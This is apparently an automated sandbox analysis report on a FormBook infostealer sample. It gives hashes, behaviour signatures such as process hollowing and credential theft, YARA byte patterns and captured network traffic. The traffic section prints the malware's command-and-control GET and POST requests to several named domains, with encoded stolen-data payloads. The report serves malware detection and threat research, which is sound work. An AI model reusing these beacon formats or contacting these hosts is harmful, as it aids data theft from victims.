Loading ...

Play interactive tourEdit tour

Analysis Report scn14092020.scr

Overview

General Information

Sample Name:scn14092020.scr (renamed file extension from scr to exe)
Analysis ID:285348
MD5:f028d6c9991258c5c75e9f234d4dee79
SHA1:2f6b7f76bb4a3342f3450e1cc9ef539c2028c59e
SHA256:576f0ed5ae69ececc1bb11492479101c0281af46cb86a73eae9195376ab02717

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • scn14092020.exe (PID: 7148 cmdline: 'C:\Users\user\Desktop\scn14092020.exe' MD5: F028D6C9991258C5C75E9F234D4DEE79)
    • scn14092020.exe (PID: 4604 cmdline: C:\Users\user\Desktop\scn14092020.exe MD5: F028D6C9991258C5C75E9F234D4DEE79)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 4452 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 5684 cmdline: /c del 'C:\Users\user\Desktop\scn14092020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
    • 0x160ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16008:$sqlite3text: 68 38 2A 90 C5
    • 0x1612d:$sqlite3text: 68 38 2A 90 C5
    • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x85d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x13ee5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x139d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x13fe7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1415f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x8fea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12c4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9d62:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18d67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19dda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.scn14092020.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.scn14092020.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.scn14092020.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
        • 0x160ec:$sqlite3step: 68 34 1C 7B E1
        • 0x16008:$sqlite3text: 68 38 2A 90 C5
        • 0x1612d:$sqlite3text: 68 38 2A 90 C5
        • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
        1.2.scn14092020.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.scn14092020.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x136ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x857a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x121dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x92f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x182f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1936a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: scn14092020.exeVirustotal: Detection: 17%Perma Link
          Source: scn14092020.exeReversingLabs: Detection: 14%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: scn14092020.exeJoe Sandbox ML: detected
          Source: 1.2.scn14092020.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024BF460 FindFirstFileW,FindNextFileW,FindClose,4_2_024BF460
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024BF459 FindFirstFileW,FindNextFileW,FindClose,4_2_024BF459
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024BF585 FindFirstFileW,FindNextFileW,FindClose,4_2_024BF585
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 4x nop then mov ecx, dword ptr [ebp-44h]0_2_0316CA70
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 4x nop then jmp 0316DB82h0_2_0316CF79
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 4x nop then pop edi1_2_00415001
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 4x nop then pop edi1_2_0040C119
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi4_2_024C5001
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi4_2_024BC119

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49738
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=0JLOdGg1pxN6Gt1Bi/JSJ+sGVc5LpPYI1jRUQtJxPcLLDPheB182/GB7jVB+9emH0R5P HTTP/1.1Host: www.brasserie-lafayette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3SsniCJrPBB9M&Bh=chLTAJW8o HTTP/1.1Host: www.clicrhonealpes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=WJb/CysgWCw91yJWs6LNuDX/buU9ws/TxtuWb/JnOd32EuNV24o2CESIFihwpFgP5dzA HTTP/1.1Host: www.animalsnecessity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=3OckiECOiD+psyI+NQjFIxWDb4gozbrDIe4cjEZ2xT/QUh3byTqlra9o3wyRY1odpqBV&Bh=chLTAJW8o HTTP/1.1Host: www.uuid.blueConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd HTTP/1.1Host: www.keebcat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=KZXmcMedBwfhNG72Yprv36X6G3gBjgWEN6ED81KrdGuEeSGip76GxhQuMQ345P+ATXiO&Bh=chLTAJW8o HTTP/1.1Host: www.revolucaomindfulness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qNSTnwpHMJRP HTTP/1.1Host: www.aktivasi-asuransi-bukalapak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuFg5MktW3Bd&Bh=chLTAJW8o HTTP/1.1Host: www.hqxmf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=CECJ5NlVRfC6rcavsOdFHLgWBVmwF6tqPRsoe/u97wTXDE14KZP6Fmisn7GjwDc8cLbW&Bh=chLTAJW8o HTTP/1.1Host: www.hivepublications.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vqP2//3Rjw/o HTTP/1.1Host: www.chehol.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHspK9JZO7aDS&Bh=chLTAJW8o HTTP/1.1Host: www.martjeje2.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.99.40.222 209.99.40.222
          Source: Joe Sandbox ViewIP Address: 164.132.235.17 164.132.235.17
          Source: Joe Sandbox ViewIP Address: 164.132.235.17 164.132.235.17
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.clicrhonealpes.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.clicrhonealpes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.clicrhonealpes.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 53 34 64 2d 58 57 65 72 4a 79 4e 59 71 63 39 53 72 34 59 45 39 4d 52 6e 74 39 41 55 50 6b 62 4c 72 45 41 75 7e 76 4c 57 34 67 61 6a 35 59 49 55 47 47 58 6d 6b 74 4f 6c 52 76 72 4d 48 72 7a 35 42 78 39 47 41 79 58 5f 39 61 44 31 54 35 4b 75 30 7a 65 66 7a 46 6b 4f 67 68 6d 78 69 4c 39 2d 58 67 68 33 53 6d 30 62 74 55 67 79 45 65 31 65 6e 43 45 71 4a 37 75 75 6b 70 44 72 68 45 50 74 65 68 77 6c 75 39 37 4d 6b 57 59 34 64 31 4e 6e 45 4b 55 5f 59 6c 55 63 49 65 35 46 70 6a 56 45 73 30 56 4c 6b 36 6d 56 61 41 74 5a 69 76 44 5f 67 77 64 6b 4a 5a 6e 68 61 58 4e 4b 41 4b 4c 78 68 4f 4e 59 54 57 6e 67 54 52 79 49 32 51 72 76 4a 41 6c 5a 73 63 79 75 44 51 4d 5a 4c 4e 53 61 32 4e 41 43 36 6f 6f 63 51 2d 39 54 54 7a 39 6c 69 6a 33 32 65 46 55 4c 62 6c 69 53 43 31 58 56 37 6d 34 55 6c 5a 30 2d 36 76 6d 65 62 74 7a 48 47 5f 55 44 73 55 63 59 4d 68 4b 46 53 52 4f 52 70 43 73 6b 6e 66 67 6f 54 6c 30 64 55 57 4d 61 62 65 7e 43 36 5f 67 7a 74 30 28 34 62 68 72 65 66 31 67 36 79 4e 61 6b 54 4d 4f 36 4c 37 37 37 52 58 51 34 6d 43 46 75 77 70 41 4e 7a 53 6d 64 6b 49 56 75 48 43 28 79 57 31 31 41 45 56 30 70 79 33 53 51 67 46 77 44 4e 43 6f 68 71 58 66 6f 61 55 56 4e 71 36 78 52 6e 50 69 63 61 37 6a 6b 6a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=S4d-XWerJyNYqc9Sr4YE9MRnt9AUPkbLrEAu~vLW4gaj5YIUGGXmktOlRvrMHrz5Bx9GAyX_9aD1T5Ku0zefzFkOghmxiL9-Xgh3Sm0btUgyEe1enCEqJ7uukpDrhEPtehwlu97MkWY4d1NnEKU_YlUcIe5FpjVEs0VLk6mVaAtZivD_gwdkJZnhaXNKAKLxhONYTWngTRyI2QrvJAlZscyuDQMZLNSa2NAC6oocQ-9TTz9lij32eFULbliSC1XV7m4UlZ0-6vmebtzHG_UDsUcYMhKFSRORpCsknfgoTl0dUWMabe~C6_gzt0(4bhref1g6yNakTMO6L777RXQ4mCFuwpANzSmdkIVuHC(yW11AEV0py3SQgFwDNCohqXfoaUVNq6xRnPica7jkjw).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.animalsnecessity.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.animalsnecessity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.animalsnecessity.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 5a 4c 76 46 63 56 55 48 61 6c 6b 76 6f 31 49 46 30 64 66 58 28 54 72 50 58 66 31 67 33 66 76 77 6a 37 4c 54 49 50 30 39 50 76 54 32 42 71 4e 62 77 49 70 6b 4f 69 61 45 61 54 74 73 6b 46 39 66 6a 70 7a 64 70 66 71 70 33 43 6a 49 75 6a 68 6d 4d 34 78 56 7a 61 42 45 71 71 77 79 28 48 79 66 71 6d 56 66 28 58 4e 47 79 30 48 55 73 69 6a 73 31 64 7a 67 6d 44 64 51 72 68 4d 44 4e 54 42 2d 48 69 32 36 78 58 58 4a 56 48 76 6b 46 39 6d 66 37 6f 49 67 58 30 54 37 64 43 5a 5a 39 71 37 4e 59 73 5a 79 79 65 4b 42 61 2d 51 71 28 70 44 4a 74 4a 53 53 50 37 68 64 35 57 72 6e 43 4c 6e 41 70 75 5a 37 38 45 33 39 4d 5f 75 38 6f 75 77 76 6c 69 28 53 33 6a 68 41 4f 77 45 43 6f 46 28 44 31 71 51 6b 37 56 7a 50 7e 65 63 74 55 47 46 45 4b 6a 7a 31 38 30 33 39 58 69 6d 4e 31 54 76 73 54 66 32 5f 57 75 74 30 72 4e 58 6a 72 49 56 79 63 48 4b 51 61 57 78 4c 75 46 51 56 48 56 73 36 65 45 7e 41 71 6d 72 79 66 37 71 33 70 32 50 65 61 30 4e 4a 6a 75 6f 69 4b 59 36 4f 74 4b 39 4a 35 64 7a 79 70 38 64 65 61 43 69 42 45 65 48 59 64 67 4c 41 70 4f 4d 50 4d 45 50 52 31 76 61 33 79 36 35 2d 35 4f 6c 67 74 53 6e 41 6a 44 65 70 61 68 53 42 54 66 32 37 68 5a 55 4c 69 6e 4d 61 58 36 75 41 7a 49 28 4d 5a 77 6e 49 69 56 4d 2d 73 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=ZLvFcVUHalkvo1IF0dfX(TrPXf1g3fvwj7LTIP09PvT2BqNbwIpkOiaEaTtskF9fjpzdpfqp3CjIujhmM4xVzaBEqqwy(HyfqmVf(XNGy0HUsijs1dzgmDdQrhMDNTB-Hi26xXXJVHvkF9mf7oIgX0T7dCZZ9q7NYsZyyeKBa-Qq(pDJtJSSP7hd5WrnCLnApuZ78E39M_u8ouwvli(S3jhAOwECoF(D1qQk7VzP~ectUGFEKjz18039XimN1TvsTf2_Wut0rNXjrIVycHKQaWxLuFQVHVs6eE~Aqmryf7q3p2Pea0NJjuoiKY6OtK9J5dzyp8deaCiBEeHYdgLApOMPMEPR1va3y65-5OlgtSnAjDepahSBTf27hZULinMaX6uAzI(MZwnIiVM-sg).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.uuid.blueConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.uuid.blueUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.uuid.blue/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 34 4d 6f 65 38 68 4f 73 76 78 71 56 7e 7a 39 4a 61 58 4c 5a 4a 30 69 7a 58 36 34 76 35 72 7a 34 52 4c 4e 61 7e 55 6c 74 36 44 28 4e 55 77 62 46 34 79 75 38 6b 65 73 55 73 41 7a 33 58 55 55 75 33 66 31 4f 55 67 71 35 54 61 55 63 6b 55 55 79 51 48 61 44 52 5a 4a 68 54 49 52 58 43 64 34 37 6d 58 56 55 35 47 28 70 61 6a 6e 6b 70 48 6b 6d 34 57 7e 4b 50 39 38 58 44 76 32 5f 78 36 52 5a 39 78 5a 52 70 64 38 31 75 6f 43 67 34 6f 53 4f 55 73 50 57 75 33 44 70 64 37 74 78 57 45 7e 70 44 36 49 4c 6b 4e 5a 7a 55 2d 69 56 34 58 34 42 4a 2d 4c 52 42 56 50 4a 57 56 38 78 53 73 7a 6d 7e 73 64 57 4d 66 4d 52 4e 6c 4c 6a 72 5f 70 38 48 51 42 76 57 58 47 37 79 6b 74 49 62 52 4f 44 6c 5f 52 41 51 76 59 50 56 44 6c 74 69 4d 58 79 35 4e 49 62 6e 54 76 41 79 74 46 72 4a 76 48 2d 4d 69 7a 6f 75 34 64 53 53 70 75 4c 35 5a 55 6b 68 56 64 4c 28 64 4f 2d 4e 45 70 59 31 55 7a 48 5a 73 34 2d 62 7a 6c 35 54 68 6c 4a 47 33 33 43 6c 74 4a 57 64 35 57 42 74 41 67 2d 78 79 53 36 6a 30 37 4b 41 77 79 61 6f 35 46 55 63 51 54 36 6d 36 35 6a 56 33 6e 75 75 33 34 32 48 65 59 51 69 4b 38 52 54 6d 67 7a 37 61 31 6a 77 49 62 42 71 31 4b 57 56 70 48 67 35 4c 47 43 6b 79 35 42 49 6e 49 70 48 43 62 79 4d 4f 6b 53 64 6d 62 56 54 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=4Moe8hOsvxqV~z9JaXLZJ0izX64v5rz4RLNa~Ult6D(NUwbF4yu8kesUsAz3XUUu3f1OUgq5TaUckUUyQHaDRZJhTIRXCd47mXVU5G(pajnkpHkm4W~KP98XDv2_x6RZ9xZRpd81uoCg4oSOUsPWu3Dpd7txWE~pD6ILkNZzU-iV4X4BJ-LRBVPJWV8xSszm~sdWMfMRNlLjr_p8HQBvWXG7yktIbRODl_RAQvYPVDltiMXy5NIbnTvAytFrJvH-Mizou4dSSpuL5ZUkhVdL(dO-NEpY1UzHZs4-bzl5ThlJG33CltJWd5WBtAg-xyS6j07KAwyao5FUcQT6m65jV3nuu342HeYQiK8RTmgz7a1jwIbBq1KWVpHg5LGCky5BInIpHCbyMOkSdmbVTw).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 5f 50 39 72 45 42 70 61 50 48 47 64 37 4c 42 6e 65 74 59 6e 63 53 6c 68 4a 43 43 76 74 43 6d 35 31 42 67 62 41 79 44 58 45 7a 47 33 72 71 33 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 52 4e 64 33 30 75 73 61 71 36 78 55 74 74 73 31 75 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tp_P9rEBpaPHGd7LBnetYncSlhJCCvtCm51BgbAyDXEzG3rq3~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zORNd30usaq6xUtts1uw).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.revolucaomindfulness.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.revolucaomindfulness.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.revolucaomindfulness.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 46 62 6a 63 43 70 75 51 4b 53 7a 70 4d 32 65 71 46 5a 69 5a 6c 74 33 34 41 45 59 76 31 78 75 44 49 4f 56 47 70 30 4b 74 57 54 33 43 57 7a 58 34 73 4a 48 6b 33 52 49 6f 51 78 4c 31 7a 61 53 6e 50 42 36 47 39 57 65 32 55 67 4d 31 46 66 4d 4e 50 59 42 61 72 31 46 30 66 70 52 69 38 6a 75 59 57 65 65 2d 48 31 79 68 34 33 75 77 53 31 35 57 6b 6d 50 42 28 57 4a 42 57 63 42 4b 77 32 6a 67 33 66 57 63 70 6c 56 4e 56 6c 7e 65 50 79 31 47 38 6e 46 68 6b 4c 5a 35 6b 55 5a 47 43 68 63 34 42 6d 49 49 73 30 69 53 53 50 55 57 65 76 5a 71 37 4d 30 53 65 66 4d 69 43 57 54 32 44 5f 37 32 65 6a 36 4f 59 54 78 32 28 44 75 73 74 34 73 65 46 42 73 37 5a 48 71 74 4a 56 56 4d 32 46 54 6d 34 32 52 31 6e 39 33 49 59 4c 47 42 35 4f 59 41 46 44 74 36 67 30 28 32 48 7a 51 55 34 4d 73 32 66 64 76 61 7a 62 47 4e 4a 58 4f 59 37 4b 59 4b 77 77 4e 5f 4c 38 38 41 6b 33 42 51 71 31 68 67 31 41 70 6c 66 73 37 54 41 66 44 4b 